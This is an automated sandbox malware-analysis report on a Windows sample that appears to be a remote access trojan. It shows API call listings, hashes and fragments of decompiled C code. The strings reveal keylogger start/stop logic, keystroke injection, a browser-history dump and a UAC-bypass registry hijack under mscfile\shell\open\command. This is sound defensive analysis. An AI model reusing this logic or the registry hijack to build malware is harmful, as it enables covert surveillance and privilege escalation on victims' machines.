                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@$??4?$basic_string@V01@V01@@closesocket
                                  • String ID:
                                  • API String ID: 2234106156-0
                                  • Opcode ID: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                  • Instruction ID: b6bede96aa3c2da0a069e28b117ba5bdb23d63fcfc1ec7a11f567b0dfa856408
                                  • Opcode Fuzzy Hash: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                  • Instruction Fuzzy Hash: 8C111C72A00218DBCB04BBF1EC599EE7769EB94355B00883EE512E71E1EF784909CB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004031F8, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000), ref: 00403224
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040322D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 0040324D
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNEL32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNEL32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00403278
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNEL32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00403297
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                  • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                  • API String ID: 1883807236-2313358711
                                  • Opcode ID: 6164d948096cc69d9a41c6752b69c33c22d8fca847b1021a8e2a0f545ec2985b
                                  • Instruction ID: 820ff65b2e21daf85941f98613c9b2fccc28e61cad3948ad9cf2f03c1057e28e
                                  • Opcode Fuzzy Hash: 6164d948096cc69d9a41c6752b69c33c22d8fca847b1021a8e2a0f545ec2985b
                                  • Instruction Fuzzy Hash: E1110A72A40554B7DB0267A9DC55BEF7B6DCB85300F0040B6F905A72C1DA780B0647EE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNEL32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNEL32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                  • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@$?c_str@?$basic_string@D@2@@std@@D@std@@G@std@@$G@2@@std@@$?size@?$basic_string@$??8std@@G@2@@0@V?$basic_string@$??4?$basic_string@CloseOpenQuerySleepV01@Value
                                  • String ID: .exe$WDH$exepath$open$temp_
                                  • API String ID: 3885969548-3088914985
                                  • Opcode ID: 167acccddfbce7862f75a81ffa886adb04af34d28bc9aa891ffc650833d03850
                                  • Instruction ID: 60cde0a6a469a490c1b109ae90cccba4ec5744e34f2951ce39ed213dd0605107
                                  • Opcode Fuzzy Hash: 167acccddfbce7862f75a81ffa886adb04af34d28bc9aa891ffc650833d03850
                                  • Instruction Fuzzy Hash: 2001D233740314A7DB0097949C59FEB7368DF84351F2040B7BA56A61D1DFB858D187AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405CCA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 53COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 19%
                                  			E00405CCA(struct HHOOK__** __ecx) {
				char _v5;
				char _v6;
				void* _t9;
				struct HHOOK__* _t16;
				struct HHOOK__** _t30;

				_push(__ecx);
				_t30 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
					_t9 = 0;
				} else {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
					E00405DD3(__ecx);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					E0041203B("[INFO]",  &_v6, "Online Keylogger Stopped",  &_v5, "Online Keylogger Stopped");
					_t30[0xf] = 0;
					_t6 =  &(_t30[0xd]); // 0x0
					_t30[0xa] = 0;
					CloseHandle( *_t6);
					if(_t30[0xf] == 0) {
						_t16 =  *_t30;
						if(_t16 != 0) {
							UnhookWindowsHookEx(_t16);
							 *_t30 = 0;
						}
					}
					_t9 = 1;
				}
				return _t9;
			}








                                  0x00405ccd
                                  0x00405cd0
                                  0x00405cd8
                                  0x00405d49
                                  0x00405cda
                                  0x00405ce9
                                  0x00405cf1
                                  0x00405d00
                                  0x00405d14
                                  0x00405d1a
                                  0x00405d22
                                  0x00405d25
                                  0x00405d28
                                  0x00405d2b
                                  0x00405d34
                                  0x00405d36
                                  0x00405d3a
                                  0x00405d3d
                                  0x00405d43
                                  0x00405d43
                                  0x00405d3a
                                  0x00405d45
                                  0x00405d45
                                  0x00405d4f

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?,?,0040D1F8,0040D2A6,00000001), ref: 00405CE9
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?), ref: 00405D00
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405D14
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • CloseHandle.KERNEL32(00000000), ref: 00405D2B
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 00405D3D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@CloseEventHandleHookUnhookV01@@V10@0@Windowsfreemallocprintfsprintf
                                  • String ID: Online Keylogger Stopped$[INFO]
                                  • API String ID: 2254939683-2146459034
                                  • Opcode ID: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                  • Instruction ID: 054b4bc7c437e62fba5109071e9382fc7819d51c50d88b2d3918446dea0eff9a
                                  • Opcode Fuzzy Hash: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                  • Instruction Fuzzy Hash: 7701F575600A04AFD710BB69DC898FFBBACEE85240340497FE84293241D779AD458FA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410440, Relevance: 12.1, APIs: 8, Instructions: 86keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041046B
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410483
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041049B
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104B0
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104C3
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104DA
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104F1
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410508
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InputSend
                                  • String ID:
                                  • API String ID: 3431551938-0
                                  • Opcode ID: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                  • Instruction ID: b328bb317d865897fc6c08efdded885432bfecfaa75727484ced0e6d4c13fc0d
                                  • Opcode Fuzzy Hash: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                  • Instruction Fuzzy Hash: F03121B1D5124EA9EB11EF949981FFFBFBCAF18301F504026E640B6142D3B446859BE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401A5E, Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E00401A5E(intOrPtr* __eax, void* __eflags, void* _a8) {
				char _v20;
				char _v36;
				void* _t18;
				void* _t20;
				intOrPtr _t39;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t39 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t18 = _t39 - 0x9b;
				if(_t18 == 0) {
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C( &_v20, __eflags, 1));
					 *0x41b288 = 1;
					_t20 = E0040180C( &_v20, __eflags, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E004020C2(0x41b240, 0x9c, _t20);
				} else {
					if(_t18 == 0) {
						E00401B26();
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}








                                  0x00401a68
                                  0x00401a6e
                                  0x00401a80
                                  0x00401a90
                                  0x00401a9f
                                  0x00401aa9
                                  0x00401ab3
                                  0x00401ab8
                                  0x00401ad5
                                  0x00401ae0
                                  0x00401ae7
                                  0x00401af2
                                  0x00401b02
                                  0x00401aba
                                  0x00401abc
                                  0x00401abe
                                  0x00401abe
                                  0x00401abc
                                  0x00401b0a
                                  0x00401b12
                                  0x00401b1b
                                  0x00401b25

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401A68
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00401A80
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401A90
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401A9F
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 00401AD5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00401AF2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000009C), ref: 00401B12
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B1B
                                    • Part of subcall function 00401B26: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                    • Part of subcall function 00401B26: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                    • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                    • Part of subcall function 00401B26: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                    • Part of subcall function 00401B26: Sleep.KERNEL32(000000FA), ref: 00401C24
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                    • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??1?$basic_string@$G@std@@$G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@V01@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$??4?$basic_string@?substr@?$basic_string@D@1@@V01@$?find@?$basic_string@FileG@1@@ModuleNameSleepV10@V10@0@V10@@
                                  • String ID:
                                  • API String ID: 573486607-0
                                  • Opcode ID: aa66e4f5bf8f0b9d55fb22090a090fc99bfa328d692b576d190f675996a42e8d
